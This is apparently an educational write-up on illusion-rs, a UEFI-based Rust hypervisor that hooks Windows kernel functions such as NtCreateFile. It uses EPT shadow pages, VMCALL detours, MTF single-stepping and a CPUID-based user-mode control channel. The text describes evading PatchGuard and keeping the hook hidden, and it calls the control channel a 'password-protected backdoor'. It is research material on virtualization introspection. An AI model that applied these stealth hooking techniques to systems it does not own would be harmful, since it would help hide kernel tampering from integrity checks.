It’s important to note that this is not an inline hook - rather, it’s a VM-exit-based intercept triggered by MSR writes. The following code shows how IA32_LSTAR interception is applied during hypervisor initialization:

Code Reference (hook_manager.rs)

trace!("Modifying MSR interception for LSTAR MSR write access");
hook_manager
    .msr_bitmap
    .modify_msr_interception(msr::IA32_LSTAR, MsrAccessType::Write, MsrOperation::Hook);

Handling WRMSR to IA32_LSTAR in handle_msr_access(): Unhook and Call set_kernel_base_and_size()

When a WRMSR VM-exit is triggered by the IA32_LSTAR hook during early kernel setup, the handle_msr_access() function unhooks the MSR and calls set_kernel_base_and_size() to resolve the kernel’s base addresses and size.

Code Reference (msr.rs)

if msr_id == msr::IA32_LSTAR {
    trace!("IA32_LSTAR write attempted with MSR value: {:#x}", msr_value);
    hook_manager.msr_bitmap.modify_msr_interception(
        msr::IA32_LSTAR,
        MsrAccessType::Write,
        MsrOperation::Unhook,
    );

    hook_manager.set_kernel_base_and_size(msr_value)?;
}

At this point in boot, the syscall entry point (KiSystemCall64) has been fully resolved by the kernel. We use its address as a scanning base to locate the start of the PE image and compute the physical base of ntoskrnl.exe.

Setting Kernel Image Base Address and Size (set_kernel_base_and_size())

We pass the MSR value to set_kernel_base_and_size, which internally calls get_image_base_address to scan memory backwards for the MZ (IMAGE_DOS_SIGNATURE) header. It then uses pa_from_va_with_current_cr3 to translate the virtual base address to a physical address using the guest’s CR3, and finally calls get_size_of_image to retrieve the size of ntoskrnl.exe from the OptionalHeader.SizeOfImage field. These operations are inherently unsafe, so it’s crucial that the correct values are passed in - otherwise, they may lead to a system crash.

Code Reference (hook_manager.rs)

self.ntoskrnl_base_va = unsafe { get_image_base_address(guest_va)? };
self.ntoskrnl_base_pa = PhysicalAddress::pa_from_va_with_current_cr3(self.ntoskrnl_base_va)?;
self.ntoskrnl_size = unsafe { get_size_of_image(self.ntoskrnl_base_pa as _).ok_or(HypervisorError::FailedToGetKernelSize)? } as u64;
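For readers unfamiliar with the backward scan, the sketch below illustrates the general idea behind a get_image_base_address-style routine: align the IA32_LSTAR value down to a page boundary and walk backwards one page at a time until the MZ (IMAGE_DOS_SIGNATURE) header is found. This is a simplified illustration under that assumption, not the project's actual implementation.

/// Illustrative only: walk backwards page by page from a kernel virtual
/// address (here, the IA32_LSTAR value) until the 'MZ' DOS signature is found.
/// The caller must guarantee that every page touched is mapped and readable.
unsafe fn find_image_base(mut va: u64) -> Option<u64> {
    const IMAGE_DOS_SIGNATURE: u16 = 0x5A4D; // "MZ"
    const PAGE_SIZE: u64 = 0x1000;

    va &= !(PAGE_SIZE - 1); // align down to the containing page
    loop {
        if core::ptr::read(va as *const u16) == IMAGE_DOS_SIGNATURE {
            return Some(va);
        }
        va = va.checked_sub(PAGE_SIZE)?; // give up on underflow
    }
}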

Detecting When SSDT Is Loaded Inside ntoskrnl.exe

Before performing EPT-based hooks on kernel functions like NtCreateFile, it is important to ensure that the System Service Descriptor Table (SSDT) has been fully initialized by the Windows kernel. Otherwise, a race condition is introduced: if hooks are applied too early, there’s a risk of targeting invalid memory when the hypervisor attempts to resolve function addresses via syscall numbers through the SSDT - a fallback used only when the function is missing from ntoskrnl.exe’s export table. This can result in a system crash. Analysis of execution paths inside ntoskrnl.exe revealed a reliable point after SSDT initialization, but still early enough in kernel setup to monitor other software invoking those functions.

Analysis of KiInitializeKernel - the core routine responsible for initializing the kernel on each processor - shows that it finalizes the SSDT by invoking KeCompactServiceTable. From this point onward, it becomes safe to install hooks. However, a reliable and repeatable trigger is still needed - ideally, any unconditional VM-exit that occurs shortly after KeCompactServiceTable is called.

Call to KeCompactServiceTable and KiSetCacheInformation Figure 2: KeCompactServiceTable() and KiSetCacheInformation() observed in KiInitializeKernel() using Binary Ninja, confirming the post-SSDT call sequence.

This is where KiSetCacheInformation becomes useful. It is invoked immediately after SSDT setup and triggers a well-defined sequence that includes CPUID instructions. On Intel CPUs, KiSetCacheInformation calls KiSetStandardizedCacheInformation, which begins issuing cpuid(4, 0) to query cache topology. The CPUID instruction unconditionally causes a VM-exit on Intel processors, and may cause a VM-exit on AMD processors depending on the intercept configuration, offering a reliable and deterministic point to synchronize EPT hook installation. This makes CPUID a convenient instruction to synchronize state transitions or trigger early hypervisor logic without guest cooperation.

Intel and AMD call paths into KiSetStandardizedCacheInformation with CPUID Figure 3: KiSetCacheInformation() and KiSetCacheInformationAmd() observed in Binary Ninja, both invoking KiSetStandardizedCacheInformation() which executes CPUID after SSDT setup.

Historically, Intel systems used the path KiSetCacheInformation -> KiSetCacheInformationIntel -> KiSetStandardizedCacheInformation. On recent Windows 10 and 11 builds, the intermediate call to KiSetCacheInformationIntel appears to have been removed - KiSetCacheInformation now calls KiSetStandardizedCacheInformation directly on Intel platforms.

On Intel processors, the execution path is reliable (verified via Binary Ninja analysis on Windows 11 build 26100):

KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetStandardizedCacheInformation
-> cpuid(4, 0)

On AMD processors, the path is conditional (verified via Binary Ninja analysis on Windows 11 build 26100):

  • If bit 22 (TopologyExtensions) in CPUID(0x80000001).ECX is set:
KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetCacheInformationAmd
-> KiSetStandardizedCacheInformation
-> cpuid(0x8000001D, 0)

This bit indicates that the processor supports CPUID(0x8000001D), which enumerates cache and topology info in a standardized way. If unset, the OS must fall back to 0x80000005 / 0x80000006.

  • Otherwise (fallback path without TopologyExtensions support):
KiInitializeKernel
-> KeCompactServiceTable
-> KiSetCacheInformation
-> KiSetCacheInformationAmd
-> cpuid(0x80000005) and cpuid(0x80000006)

Although cpuid(4, 0) on Intel and cpuid(0x8000001D, 0) on AMD are executed shortly after SSDT setup in tested Windows builds, this hypervisor uses cpuid(2, 0) instead. This was a mistake carried over from early development - cpuid(0x2) is not part of the same KiSetCacheInformation() path and isn’t a deterministic indicator of SSDT completion. It happened to fire reliably during boot on test systems, which made it “good enough” at the time. Since the project is no longer actively maintained, the code was left as-is - but for anyone adapting this for production use, hooking cpuid(4, 0) or cpuid(0x8000001D) is the correct path.

Setting Up EPT Hooks (handle_cpuid())

The CPUID instruction executes multiple times during early boot, which can lead to redundant VM-exits. To avoid repeated hook setup, the hypervisor uses a has_cpuid_cache_info_been_called flag. The hook only needs to run once, after SSDT initialization, making this a straightforward and stable timing marker.

Code Reference (cpuid.rs)

match leaf {
    leaf if leaf == CpuidLeaf::CacheInformation as u32 => {
        trace!("CPUID leaf 0x2 detected (Cache Information).");
        if !hook_manager.has_cpuid_cache_info_been_called {
            hook_manager.manage_kernel_ept_hook(
                vm,
                crate::windows::nt::pe::djb2_hash("NtCreateFile".as_bytes()),
                0x0055,
                crate::intel::hooks::hook_manager::EptHookType::Function(
                    crate::intel::hooks::inline::InlineHookType::Vmcall
                ),
                true,
            )?;
            hook_manager.has_cpuid_cache_info_been_called = true;
        }
    }
}

This ensures that we only apply our EPT function hook after the SSDT has been initialized and guarantees that subsequent CPUID calls won’t re-trigger the hook logic.

Resolving Targets and Dispatching Hooks (manage_kernel_ept_hook())

Let’s break down what the manage_kernel_ept_hook function does. It manages the installation or removal of an Extended Page Table (EPT) hook on a target kernel function, such as NtCreateFile.

The logic is straightforward: given a hashed function name and a syscall number, it first tries to resolve the function’s virtual address using get_export_by_hash, which checks the export table of ntoskrnl.exe. If that fails, it falls back to resolving the function using its syscall number through the System Service Descriptor Table (SSDT).

If enable == true, it calls ept_hook_function(), which installs the hook by shadowing the guest memory and modifying EPT permissions - more on this later. If enable == false, it calls ept_unhook_function() to restore the original mapping and unhook the function.

Code Reference (hook_manager.rs)

pub fn manage_kernel_ept_hook(
    &mut self,
    vm: &mut Vm,
    function_hash: u32,
    syscall_number: u16,
    ept_hook_type: EptHookType,
    enable: bool,
) -> Result<(), HypervisorError> {
    let action = if enable { "Enabling" } else { "Disabling" };
    debug!("{} EPT hook for function: {:#x}", action, function_hash);

    trace!("Ntoskrnl base VA: {:#x}", self.ntoskrnl_base_va);
    trace!("Ntoskrnl base PA: {:#x}", self.ntoskrnl_base_pa);
    trace!("Ntoskrnl size: {:#x}", self.ntoskrnl_size);

    let function_va = unsafe {
        if let Some(va) = get_export_by_hash(self.ntoskrnl_base_pa as _, self.ntoskrnl_base_va as _, function_hash) {
            va
        } else {
            let ssdt_function_address =
                SsdtHook::find_ssdt_function_address(syscall_number as _, false, self.ntoskrnl_base_pa as _, self.ntoskrnl_size as _);
            match ssdt_function_address {
                Ok(ssdt_hook) => ssdt_hook.guest_function_va as *mut u8,
                Err(_) => return Err(HypervisorError::FailedToGetExport),
            }
        }
    };

    if enable {
        self.ept_hook_function(vm, function_va as _, function_hash, ept_hook_type)?;
    } else {
        self.ept_unhook_function(vm, function_va as _, ept_hook_type)?;
    }

    Ok(())
}
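The function_hash passed to get_export_by_hash above is produced by hashing the export name, which avoids embedding plaintext strings in the hypervisor. Below is a minimal sketch of the classic djb2 hash for illustration; the project's own djb2_hash may differ in details such as case handling.

/// Classic djb2 string hash: hash = hash * 33 + byte, seeded with 5381.
fn djb2_hash(bytes: &[u8]) -> u32 {
    let mut hash: u32 = 5381;
    for &b in bytes {
        hash = hash.wrapping_mul(33).wrapping_add(b as u32);
    }
    hash
}

// Example: resolving NtCreateFile by hash rather than by name.
// let hash = djb2_hash("NtCreateFile".as_bytes());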

Second-Level Address Translation (SLAT): EPT (Intel) and NPT (AMD)

Before we get into the specifics of syscall hooks and memory interception, it’s worth covering how this all works under the hood - especially for readers who aren’t already familiar with memory virtualization.

Second-Level Address Translation (SLAT) - also known as nested paging - is a hardware virtualization feature that allows the hypervisor to define a second layer of page translation. The CPU uses this hypervisor-defined mapping to translate guest physical addresses to host physical addresses without requiring software intervention on each memory access. In other words, SLAT introduces an additional layer of address translation between guest physical addresses (GPAs) and host physical addresses (HPAs).

The guest OS configures its own page tables to translate guest virtual addresses (GVAs) to guest physical addresses (GPAs), while the hypervisor configures extended or nested page tables (e.g., EPT or NPT) to translate those GPAs to HPAs. Both stages are carried out by the hardware MMU during memory access, not by software.

The two most common SLAT implementations are Intel’s Extended Page Tables (EPT) under VT-x, and AMD’s Nested Page Tables (NPT) under SVM. These technologies allow guest operating systems to manage their own page tables independently, while the hypervisor handles the second level of memory translation.

To illustrate the first stage of this process - from guest virtual address (GVA) to guest physical address (GPA) - the diagram below shows how a 48-bit x64 virtual address is resolved using traditional paging inside the guest. This is exactly what the guest OS configures, regardless of whether SLAT is enabled.

x64 Virtual Address Translation Figure 4: Traditional x64 virtual address translation as performed by the guest OS (source: Guided Hacking, YouTube)
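To make this first stage concrete, the sketch below splits a canonical 48-bit virtual address into the four 9-bit table indices and the 12-bit page offset used by the guest's own page-table walk. The function name and tuple layout are illustrative only.

/// Illustrative decomposition of a 48-bit x64 virtual address (GVA -> GPA stage).
fn decode_virtual_address(va: u64) -> (u64, u64, u64, u64, u64) {
    let pml4_index = (va >> 39) & 0x1FF; // bits 47..39
    let pdpt_index = (va >> 30) & 0x1FF; // bits 38..30
    let pd_index = (va >> 21) & 0x1FF;   // bits 29..21
    let pt_index = (va >> 12) & 0x1FF;   // bits 20..12
    let page_offset = va & 0xFFF;        // bits 11..0
    (pml4_index, pdpt_index, pd_index, pt_index, page_offset)
}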

EPT Hooking Overview (build_identity())

When the hypervisor starts, it sets up Extended Page Tables (EPT) to create a 1:1 identity map - guest physical addresses are mapped directly to the same host physical addresses. This identity mapping allows the guest to run normally, while the hypervisor controls memory access at the page level without interfering with the guest’s own page tables.

The function responsible for setting this up is build_identity(). The first 2MB of memory is mapped using 4KB EPT page tables. All remaining guest physical addresses are mapped using 2MB large pages, unless finer granularity is required - such as when placing hooks.

While it’s also possible to use 1GB pages, illusion-rs opts for 2MB mappings to simplify EPT management and ensure compatibility with platforms like VMware, which do not support 1GB EPT pages. Since Illusion was tested under VMware, 2MB pages were the most practical choice for early boot introspection and syscall hooking.

Code Reference (ept.rs)

/// Represents the entire Extended Page Table structure.
///
/// EPT is a set of nested page tables similar to the standard x86-64 paging mechanism.
/// It consists of 4 levels: PML4, PDPT, PD, and PT.
///
/// Reference: Intel® 64 and IA-32 Architectures Software Developer's Manual: 29.3.2 EPT Translation Mechanism
#[repr(C, align(4096))]
pub struct Ept {
    /// Page Map Level 4 (PML4) Table.
    pml4: Pml4,
    /// Page Directory Pointer Table (PDPT).
    pdpt: Pdpt,
    /// Array of Page Directory Table (PDT).
    pd: [Pd; 512],
    /// Page Table (PT).
    pt: Pt,
}

pub fn build_identity(&mut self) -> Result<(), HypervisorError> {
    let mut mtrr = Mtrr::new();
    trace!("{mtrr:#x?}");
    trace!("Initializing EPTs");

    let mut pa = 0u64;

    self.pml4.0.entries[0].set_readable(true);
    self.pml4.0.entries[0].set_writable(true);
    self.pml4.0.entries[0].set_executable(true);
    self.pml4.0.entries[0].set_pfn(addr_of!(self.pdpt) as u64 >> BASE_PAGE_SHIFT);

    for (i, pdpte) in self.pdpt.0.entries.iter_mut().enumerate() {
        pdpte.set_readable(true);
        pdpte.set_writable(true);
        pdpte.set_executable(true);
        pdpte.set_pfn(addr_of!(self.pd[i]) as u64 >> BASE_PAGE_SHIFT);

        for pde in &mut self.pd[i].0.entries {
            if pa == 0 {
                pde.set_readable(true);
                pde.set_writable(true);
                pde.set_executable(true);
                pde.set_pfn(addr_of!(self.pt) as u64 >> BASE_PAGE_SHIFT);

                for pte in &mut self.pt.0.entries {
                    let memory_type = mtrr
                        .find(pa..pa + BASE_PAGE_SIZE as u64)
                        .ok_or(HypervisorError::MemoryTypeResolutionError)?;
                    pte.set_readable(true);
                    pte.set_writable(true);
                    pte.set_executable(true);
                    pte.set_memory_type(memory_type as u64);
                    pte.set_pfn(pa >> BASE_PAGE_SHIFT);
                    pa += BASE_PAGE_SIZE as u64;
                }
            } else {
                let memory_type = mtrr
                    .find(pa..pa + LARGE_PAGE_SIZE as u64)
                    .ok_or(HypervisorError::MemoryTypeResolutionError)?;

                pde.set_readable(true);
                pde.set_writable(true);
                pde.set_executable(true);
                pde.set_memory_type(memory_type as u64);
                pde.set_large(true);
                pde.set_pfn(pa >> BASE_PAGE_SHIFT);
                pa += LARGE_PAGE_SIZE as u64;
            }
        }
    }

    Ok(())
}

This identity map is later used when installing EPT hooks. It allows the hypervisor to shadow guest memory, modify EPT permissions (like making a page execute-only), and safely redirect execution to hook logic - all without modifying guest memory directly.

Installing the Hook Payload (ept_hook_function())

The ept_hook_function() is the heart of the EPT-based function hooking logic in Illusion. This is where a selected guest function is shadowed, modified, and hooked - all without touching the original memory. Execution is redirected by changing EPT permissions to point to a modified shadow page instead of the original, allowing introspection and control without altering guest state.

This section explains what the function does, which internal calls it makes, and why each step is necessary. Steps 1 through 9 correspond to the diagram shown earlier in the article.

Code Reference (hook_manager.rs)

Mapping the Large Page (map_large_page_to_pt())

We begin by ensuring the 2MB large page that contains the target function is registered in the hypervisor’s internal memory management structures. The illusion-rs hypervisor operates with a 1:1 identity mapping between Guest Physical Addresses (GPA) and Host Physical Addresses (HPA), but before any manipulation or permission control can occur, we must first associate this large page with a pre-allocated page table.

These pre-allocated page tables are not allocated dynamically at runtime - instead, a fixed-size pool is reserved at hypervisor startup as part of a pre-allocated heap defined by the user. This memory is shared across all logical processors and is used to back internal structures such as shadow pages and page tables. The heap uses a linked list-based allocator (similar to a classic free-list strategy, not slab or buddy), with allocations performed from a contiguous block of memory (defaulting to 64MB). While the exact number of supported allocations depends on user-defined sizing and workload patterns, all allocations are strictly bounded. If the pool is exhausted, further allocations will fail at the point of use, likely triggering a panic unless explicitly handled.

By calling map_large_page_to_pt(), we link the GPA of the large page to a known internal structure, allowing for controlled splitting, shadowing, and permission enforcement. This also makes it easier to track and restore the original page mappings when hooks need to be removed or toggled later.

self.memory_manager.map_large_page_to_pt(guest_large_page_pa.as_u64())?;
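To illustrate the kind of pre-allocated pool described above, here is a minimal free-list sketch: a fixed buffer is carved into page-sized blocks, and a singly linked list is threaded through the free blocks themselves. All names are hypothetical, and this is not the allocator used by illusion-rs.

use core::ptr;

const BLOCK_SIZE: usize = 4096;

/// A free block stores only the pointer to the next free block.
struct FreeBlock {
    next: *mut FreeBlock,
}

/// A fixed pool with a free list threaded through its unused blocks.
struct FixedPool {
    head: *mut FreeBlock,
}

impl FixedPool {
    /// Carve `pool` into BLOCK_SIZE chunks and link them together.
    unsafe fn new(pool: *mut u8, pool_len: usize) -> Self {
        let mut head: *mut FreeBlock = ptr::null_mut();
        let mut offset = 0usize;
        while offset + BLOCK_SIZE <= pool_len {
            let block = pool.add(offset) as *mut FreeBlock;
            (*block).next = head;
            head = block;
            offset += BLOCK_SIZE;
        }
        FixedPool { head }
    }

    /// Pop one block, or None once the pool is exhausted.
    unsafe fn alloc(&mut self) -> Option<*mut u8> {
        if self.head.is_null() {
            return None;
        }
        let block = self.head;
        self.head = (*block).next;
        Some(block as *mut u8)
    }

    /// Return a block to the free list.
    unsafe fn free(&mut self, block: *mut u8) {
        let block = block as *mut FreeBlock;
        (*block).next = self.head;
        self.head = block;
    }
}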

Step 1 - Splitting the Page (is_large_page() -> split_2mb_to_4kb())

When a target function resides within a 2MB large page, changing its permissions would affect the entire region - potentially disrupting unrelated code and triggering VM-exits across the full range. To avoid this, we check if the region is backed by a large page and, if so, split it into 512 individual 4KB entries using a pre-allocated page table. This provides the fine-grained control necessary for isolated function hooking, ensuring only the targeted page generates VM-exits.

if vm.primary_ept.is_large_page(guest_page_pa.as_u64()) {
    let pre_alloc_pt = self
        .memory_manager
        .get_page_table_as_mut(guest_large_page_pa.as_u64())
        .ok_or(HypervisorError::PageTableNotFound)?;

    vm.primary_ept.split_2mb_to_4kb(guest_large_page_pa.as_u64(), pre_alloc_pt)?;
}

Shadowing the Page (is_guest_page_processed() -> map_guest_to_shadow_page())

Before installing any detours, we first check whether a shadow page has already been allocated and mapped for the target guest page. If a mapping already exists, it means this page was previously processed and no further action is needed. Otherwise, we pull a shadow page from our pre-allocated pool and associate it with the guest page using map_guest_to_shadow_page(). This ensures hooks aren’t redundantly reinstalled and prevents multiple shadow pages from being created for the same target. It’s essential for correctness: when a VM-exit occurs due to an EPT violation, we must be able to reliably retrieve the shadow page associated with the faulting guest page.

if !self.memory_manager.is_guest_page_processed(guest_page_pa.as_u64()) {
    self.memory_manager.map_guest_to_shadow_page(
        guest_page_pa.as_u64(),
        guest_function_va,
        guest_function_pa.as_u64(),
        ept_hook_type,
        function_hash,
    )?;
}

Step 2 - Cloning the Code (unsafe_copy_guest_to_shadow())

Once the shadow page has been allocated and mapped, we clone the guest’s original 4KB page into it using unsafe_copy_guest_to_shadow(). This creates a byte-for-byte replica of the guest memory that we can safely modify. Because we perform all modifications in this isolated shadow copy - rather than directly in guest memory - we avoid detection by integrity verification checks like PatchGuard and preserve the original code for future restoration.

let shadow_page_pa = PAddr::from(
    self.memory_manager
        .get_shadow_page_as_ptr(guest_page_pa.as_u64())
        .ok_or(HypervisorError::ShadowPageNotFound)?,
);

Self::unsafe_copy_guest_to_shadow(guest_page_pa, shadow_page_pa);

Step 3 - Installing the Inline Hook

Once the shadow page is prepared, we compute the exact offset where the target function resides relative to the start of the page. This ensures the hook is applied at the correct instruction boundary. At that offset, we insert an inline detour - typically using a VMCALL opcode - which causes a controlled VM-exit whenever the hooked function is executed. This redirection is handled entirely within the hypervisor.

Traditional JMP-based hooks are avoided here because the hypervisor operates outside the guest’s address space in a UEFI context. While it is technically possible to inject hook logic into guest memory (as explored in early versions of illusion-rs), the EPT + VMCALL approach was chosen to keep logic fully on the host side and as a learning experience. For more background on the guest-assisted design, see Appendix: Guest-Assisted Hooking Model.

let shadow_function_pa = PAddr::from(Self::calculate_function_offset_in_host_shadow_page(shadow_page_pa, guest_function_pa));

InlineHook::new(shadow_function_pa.as_u64() as *mut u8, inline_hook_type).detour64();
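As a point of reference, the detour itself can be as small as the three-byte VMCALL encoding (0F 01 C1, which also shows up later in the WinDbg output). The sketch below shows the general idea of writing it at the computed offset inside the shadow page; it is illustrative only, while the project's InlineHook handles additional details such as hook-type selection and displaced-byte accounting.

/// Illustrative only: place a bare VMCALL at the function's offset inside the
/// writable, host-owned shadow page.
unsafe fn write_vmcall_detour(shadow_function: *mut u8) {
    const VMCALL: [u8; 3] = [0x0F, 0x01, 0xC1];
    core::ptr::copy_nonoverlapping(VMCALL.as_ptr(), shadow_function, VMCALL.len());
}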

Step 4 - Revoking Execute Rights (modify_page_permissions())

To ensure our detour is triggered, we revoke execute permissions on the guest’s original page via the EPT. This causes any instruction fetch from that page to generate a VM-exit due to an EPT violation. The hypervisor can then handle this event and reroute execution to the shadow page where our hook is installed. Importantly, we retain read and write permissions on the original page to maintain system stability and avoid triggering protection features like PatchGuard.

vm.primary_ept.modify_page_permissions(
    guest_page_pa.as_u64(),
    AccessType::READ_WRITE,
    pre_alloc_pt,
)?;

Step 5 - Invalidating TLB and EPT Caches (invept_all_contexts())

Once the execute permission is removed from the original guest page and replaced with a shadowed hook, the CPU’s internal caches may still contain stale translations. To ensure the updated EPT mappings take effect immediately, the hypervisor flushes the virtualization translation caches using the INVEPT instruction.

invept_all_contexts();

This call performs an all-contexts invalidation, instructing the CPU to discard EPT-derived translations for all EPT pointers (EPTPs). Per Intel’s SDM, this ensures that stale mappings are removed regardless of the active EPTP or any associated VPID or PCID values.

Because EPT translations are cached per logical processor, INVEPT must be executed on each vCPU, regardless of whether the hypervisor uses shared or per-core EPTs. Without proper synchronization, race conditions may occur during thread migration or instruction replay, potentially leading to stale mappings and inconsistent hook behavior across cores.

INVVPID is not necessary here. It’s used to invalidate guest-virtual mappings tied to VPIDs, which is unrelated to EPT-based translation. For our use case - modifying guest-physical EPT mappings - INVEPT alone is sufficient.

This step completes the hook installation pipeline. From this point forward, the guest kernel continues to operate normally, but any attempt to execute the hooked function will trigger an EPT violation, allowing the hypervisor to intercept the execution path - all without modifying guest memory.

Step 6 and 7 - Catching Execution with EPT Violations (handle_ept_violation())

After an EPT violation VM-exit occurs, the first step is identifying which page triggered the fault. We read the faulting Guest Physical Address (GPA) from the VMCS and align it to the 4KB and 2MB page boundaries. This lets us resolve which specific page was accessed and prepares us to look it up in the shadow page tracking structures.

Code Reference (ept_violation.rs)

let guest_pa = vmread(vmcs::ro::GUEST_PHYSICAL_ADDR_FULL);
let guest_page_pa = PAddr::from(guest_pa).align_down_to_base_page();
let guest_large_page_pa = guest_page_pa.align_down_to_large_page();

Once we have the faulting guest page address, we retrieve the corresponding shadow page that was previously mapped and prepared during hook installation. This page contains our modified copy of the function with a VMCALL detour inserted. If no shadow page is found for the faulting guest page, it indicates an unexpected EPT violation not associated with an installed hook; in illusion-rs, this condition is treated as a fatal error and terminates VM-exit handling. In a production-grade hypervisor, such cases should be logged and handled more gracefully to detect guest misbehavior, memory tampering, or logic errors in hook tracking.

let shadow_page_pa = PAddr::from(
    hook_manager
        .memory_manager
        .get_shadow_page_as_ptr(guest_page_pa.as_u64())
        .ok_or(HypervisorError::ShadowPageNotFound)?
);

Before deciding how to respond, we inspect the cause of the violation by reading the EXIT_QUALIFICATION field. This tells us what kind of access the guest attempted - whether it was trying to read, write, or execute memory - and lets us act accordingly.

let exit_qualification_value = vmread(vmcs::ro::EXIT_QUALIFICATION);
let ept_violation_qualification = EptViolationExitQualification::from_exit_qualification(exit_qualification_value);

If the violation indicates an attempt to execute a non-executable page (i.e., it’s readable and writable but not executable), we swap in our shadow page and mark it as execute-only. This redirects execution to our tampered memory, where the inline hook (e.g., VMCALL) resides, allowing the hypervisor to take control.

if ept_violation_qualification.readable && ept_violation_qualification.writable && !ept_violation_qualification.executable {
    vm.primary_ept.swap_page(guest_page_pa.as_u64(), shadow_page_pa.as_u64(), AccessType::EXECUTE, pre_alloc_pt)?;
}

This redirection hands execution over to our shadow page - a byte-for-byte clone of the original memory - where the first few instructions have been overwritten with a VMCALL. At this point, guest execution resumes without advancing RIP, meaning the CPU re-executes the same instruction - but now from the shadow page. When the CPU reaches the VMCALL instruction, it triggers another VM-exit. Because we’ve displaced the function’s original prologue, those instructions must later be restored and replayed under Monitor Trap Flag (MTF) single-stepping. In the Matrix Windows kernel driver-based hypervisor, the shadow page contains an INT3 hook that triggers a VM-exit; the hypervisor sets the guest RIP to the hook handler, performs introspection, and then returns execution via a trampoline. In illusion (a UEFI-based hypervisor), EPT + MTF was chosen instead. This allowed execution redirection to occur entirely from host-side logic, as a simpler and educational approach, without requiring guest-mode memory allocation or in-guest control flow setup. (For alternative designs involving guest memory injection, see Appendix: Guest-Assisted Hooking Model.)

Step 8 - Handling VMCALL Hooks (handle_vmcall())

The VMCALL instruction is inserted by our inline hook as the first instruction in the shadowed function. When executed, it causes an unconditional VM-exit, transferring control to the hypervisor. This lets us detect exactly when the guest invokes the hooked function.

Code Reference (vmcall.rs)

We begin by resolving the guest physical page that triggered the VMCALL, and check whether it belongs to a shadow page previously registered by the hook manager. If the page is found in our shadow mapping infrastructure, we know execution originated from a function we’ve hooked. This conditional check ensures we’re handling a legitimate hook-triggered exit before proceeding with further memory transitions and state changes. At this point, we know exactly which function was called, and with full control in the hypervisor, we can inspect its arguments, trace its execution, and introspect guest memory or registers as needed.

let exit_type = if let Some(shadow_page_pa) = hook_manager.memory_manager.get_shadow_page_as_ptr(guest_page_pa.as_u64()) {
    let pre_alloc_pt = hook_manager
        .memory_manager
        .get_page_table_as_mut(guest_large_page_pa.as_u64())
        .ok_or(HypervisorError::PageTableNotFound)?;

After completing any introspection or analysis - such as inspecting arguments, tracing execution, or examining guest memory - in the hypervisor, we begin restoring guest state. Specifically, we swap back the original (unmodified) guest page and temporarily restore READ_WRITE_EXECUTE permissions. This is required to safely execute the instructions that were originally overwritten by our inline VMCALL detour (typically 2 - 5 bytes at the prologue of the target function).

vm.primary_ept.swap_page(guest_page_pa.as_u64(), guest_page_pa.as_u64(), AccessType::READ_WRITE_EXECUTE, pre_alloc_pt)?;

Before enabling MTF, we retrieve the hook metadata and determine how many instructions were displaced by the inline VMCALL. Simply restoring the page and continuing execution would risk a crash - since the prologue was never executed - and would leave the function unmonitored. To prevent this, we need to single-step through the displaced instructions using MTF. Before resuming the guest, we initialize a replay counter, set the Monitor Trap Flag (MTF), and disable guest interrupts to prevent unexpected interrupt handling during the instruction-by-instruction re-execution. This step sets up the replay process that continues in the next section.

let instruction_count = HookManager::calculate_instruction_count(...);
vm.mtf_counter = Some(instruction_count);
set_monitor_trap_flag(true);
update_guest_interrupt_flag(vm, false)?;

If no shadow mapping is found for the faulting guest page, the VMCALL is assumed to be invalid or executed from an unexpected context. To emulate expected CPU behavior, illusion-rs injects a #UD (undefined instruction) exception, consistent with how the processor handles VMCALL outside VMX operation.

Step 9 - Single-Stepping with Monitor Trap Flag (handle_monitor_trap_flag())

Monitor Trap Flag (MTF) enables the hypervisor to single-step through the instructions that were displaced by the inline VMCALL. Each instruction executed by the guest causes a VM-exit, at which point we decrement the instruction replay counter.

Code Reference (mtf.rs)

*counter = counter.saturating_sub(1);

Execution continues one instruction at a time under hypervisor supervision until all overwritten bytes have been replayed. Once the counter reaches zero, we know the prologue has been fully restored. At this point, we reapply the hook by swapping the shadow page back in and setting it as execute-only, ensuring the next invocation of this function once again triggers a VMCALL.

vm.primary_ept.swap_page(guest_pa.align_down_to_base_page().as_u64(), shadow_page_pa.as_u64(), AccessType::EXECUTE, pre_alloc_pt)?;

Finally, we disable MTF - by simply omitting set_monitor_trap_flag(true) - and re-enable guest interrupts, allowing the guest to resume execution cleanly.

restore_guest_interrupt_flag(vm)?;

This completes the detour cycle. The guest continues uninterrupted, unaware that its control flow was temporarily redirected through our hypervisor.

Catching Read/Write Violations (handle_ept_violation())

Sometimes, the guest may attempt to read or write from a page that’s currently marked as execute-only. Since EPT enforces strict access permissions, this triggers an EPT violation VM-exit - this time due to a read or write on a page that lacks the appropriate permissions.

Code Reference (ept_violation.rs)

if ept_violation_qualification.executable && !ept_violation_qualification.readable && !ept_violation_qualification.writable {
    vm.primary_ept.swap_page(guest_page_pa.as_u64(), guest_page_pa.as_u64(), AccessType::READ_WRITE_EXECUTE, pre_alloc_pt)?;
    vm.mtf_counter = Some(1);
    set_monitor_trap_flag(true);
    update_guest_interrupt_flag(vm, false)?;
}

To handle this safely, we temporarily restore the original guest page with full read, write, and execute access. This ensures the instruction executes successfully - even if it uses RIP-relative addressing or accesses data on the same page - preventing a VM-exit loop, system crashes, or exposure of the hook. We then enable Monitor Trap Flag (MTF) and step forward a single instruction before reapplying the original hook, preserving stealth and stability.

Illusion Execution Trace: Proof-of-Concept Walkthrough

This Proof-of-Concept (PoC) demonstrates how the Illusion hypervisor integrates early boot-time EPT hooking with a user-mode control channel. After initializing the hypervisor from UEFI, a command-line utility communicates using intercepted CPUID instructions to toggle kernel hooks in real-time - without requiring kernel-mode drivers or directly modifying guest virtual or physical memory.

Controlling EPT Hooks via Hypercalls

Before testing the hook logic, we first launch the hypervisor directly from the UEFI shell. This ensures that the hypervisor is loaded at boot and remains isolated from the Windows kernel.

Booting Illusion Hypervisor from UEFI Shell Figure 5: Booting the Illusion hypervisor directly from the UEFI shell

Once loaded, we can issue commands from user-mode using a simple client. This CLI utility interfaces with a password-protected backdoor exposed by the hypervisor. The communication channel is implemented using the CPUID instruction - an unprivileged x86 instruction that unconditionally causes a VM-exit under VT-x - which allows us to implement stealthy hypercalls from user mode without needing any kernel-mode components.
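A user-mode hypercall of this kind needs nothing more than the CPUID intrinsic. The sketch below shows the general shape; the leaf value, command encoding, and password handling are placeholders, not the actual illusion-rs protocol.

use core::arch::x86_64::__cpuid_count;

// Placeholder values - the real command set and "password" live in the illusion-rs client.
const HYPERCALL_LEAF: u32 = 0x4000_1337;
const CMD_ENABLE_NTCREATEFILE_HOOK: u32 = 0x1;

fn send_hypercall() -> u32 {
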